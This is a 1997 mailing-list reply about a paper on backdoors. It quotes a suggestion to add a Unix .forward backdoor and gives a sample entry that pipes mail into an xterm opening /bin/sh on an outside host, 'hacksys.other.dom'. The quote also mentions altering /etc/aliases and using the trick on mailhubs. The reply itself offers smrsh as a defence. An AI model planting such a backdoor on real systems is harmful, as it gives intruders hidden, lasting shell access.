Re: Backdoor Paper

Darren Reed (avalon@COOMBS.ANU.EDU.AU)
Tue, 26 Aug 1997 10:31:36 +1000

In some mail from Evil Pete, sie said:
>
> >Here's a paper I wrote on backdoors. Feedback welcome.
>
> <snip>
>
> you may want to add:
>
>
> .forward Backdoor
>
> On Unix machines, placing commands into the .forward file was also
> a common method of regaining access. For the account ``username''
> a .forward file might be constructed as follows:
>
> \username
> |"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"
>
> permutations of this method include alteration of the systems mail
> aliases file (most commonly located at /etc/aliases). Note that
> this is a simple permutation, the more advanced can run a simple
> script from the forward file that can take arbitrary commands via
> stdin (after minor preprocessing).
>
>
> -Pete
>
> PS: The above method is also useful gaining access a companies
> mailhub (assuming there is a shared a home directory FS on
> the client and server).

Using smrsh can effectively negate this backdoor (although it's quite
possibly still a problem if you allow things like elm's filter or
procmail which can run programs themselves...).

Darren